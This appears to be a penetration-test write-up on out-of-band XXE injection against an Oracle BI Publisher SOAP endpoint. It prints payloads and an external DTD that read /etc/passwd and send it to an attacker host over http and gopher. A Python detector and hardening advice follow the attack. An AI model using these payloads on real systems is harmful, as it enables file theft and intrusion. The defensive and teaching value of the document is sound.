Out of Band XXE Injection Via gopher
While I was doing a penetration test, I found a page that uses an Oracle product.
After searching, I found this exploit, which seemed to be valid:
So let's try this exploit:
POST /xmlpserver/services/ServiceGateway HTTP/1.1
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
First, to confirm the vulnerability, let's try Burp Collaborator:
So now we are sure that there is out-of-band XML injection, as the server makes DNS and HTTP queries to Burp Collaborator.
Let's try to exfiltrate data using out-of-band XXE; we could use this payload:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://myhost/evil.dtd">
evil.dtd is hosted on my server, and this is its content:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://myhost:80/%file;'>"> %all;
Here we could exfiltrate the first line of /etc/passwd.
Now our goal is to get the whole /etc/passwd file. I searched for this issue, and one of the methods is to use an FTP server and connect with ftp://myhost:port, but this method failed, as the server rejected that URI scheme.
At last I managed to do this using the gopher URI scheme, so evil.dtd will be as follows:
<!ENTITY % all "<!ENTITY send SYSTEM 'gopher://myhost:80/%file;'>"> %all;
and I ran tcpdump on port 80 using this command:
tcpdump -A src host vulnerablehost and port 80 and greater 1000
As seen, we could extract any file using the gopher URI scheme with out-of-band XXE injection.
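From the defending side, the chain above has two stages: the request body only declares a file:// entity and an http:// fetch of the external DTD, while the gopher:// URI is introduced by that DTD and never appears in the request. The Python below is an added example, not code from the post or from Oracle's product; it inspects a document for external entity declarations in the DOCTYPE (the signal a request-side check can see), and shows the usual hardening of refusing any DOCTYPE before parsing. XXE_DOC and BENIGN_DOC are constructed samples shaped like the post's payload, and the host name myhost is the post's placeholder.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples (not captures from the engagement in the post).
# XXE_DOC has the shape of the post's first stage: one parameter entity reading
# a local file, another pulling the attacker-hosted DTD, then referencing it.
XXE_DOC = (
    '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [\n'
    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    '<!ENTITY % dtd SYSTEM "http://myhost/evil.dtd">\n'
    '%dtd;]><m/>'
)
BENIGN_DOC = '<m><a>1</a></m>'

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b[^\[>]*(?:\[(.*?)\])?\s*>', re.S)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?([\w.-]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+["\'][^"\']*["\'])\s+["\']([^"\']+)["\']', re.I)

def external_entities(doc):
    """List (name, is_parameter, scheme) for every external entity declared in
    the DOCTYPE's internal subset. Any entry means the document asks the parser
    to fetch a URI; the post shows file, http and gopher schemes in that role."""
    m = DOCTYPE_RE.search(doc)
    if not m or m.group(1) is None:
        return []
    return [(name, bool(pct), uri.split(':', 1)[0].lower())
            for pct, name, uri in ENTITY_RE.findall(m.group(1))]

def classify(doc):
    """'block' if the DOCTYPE declares external entities, 'review' if there is
    a DOCTYPE without any, 'allow' otherwise. The gopher:// URI of the second
    stage lives only in the remote DTD, so this check fires on the presence of
    any external fetch rather than on a particular scheme."""
    if external_entities(doc):
        return 'block'
    return 'review' if DOCTYPE_RE.search(doc) else 'allow'

def parse_hardened(doc):
    """Parse only documents that carry no DOCTYPE at all (the same policy as
    the Xerces disallow-doctype-decl feature): with no DTD there are no entity
    declarations, so neither stage of the chain can start. Returns the root."""
    if DOCTYPE_RE.search(doc):
        raise ValueError("DOCTYPE not allowed")
    return ET.fromstring(doc)
```

Blocking the DOCTYPE on the request side is the control that closes the issue; egress filtering and alerting on outbound connections from the XML service to unexpected hosts catch what a request-side check cannot see, such as the gopher connection the post observed with tcpdump.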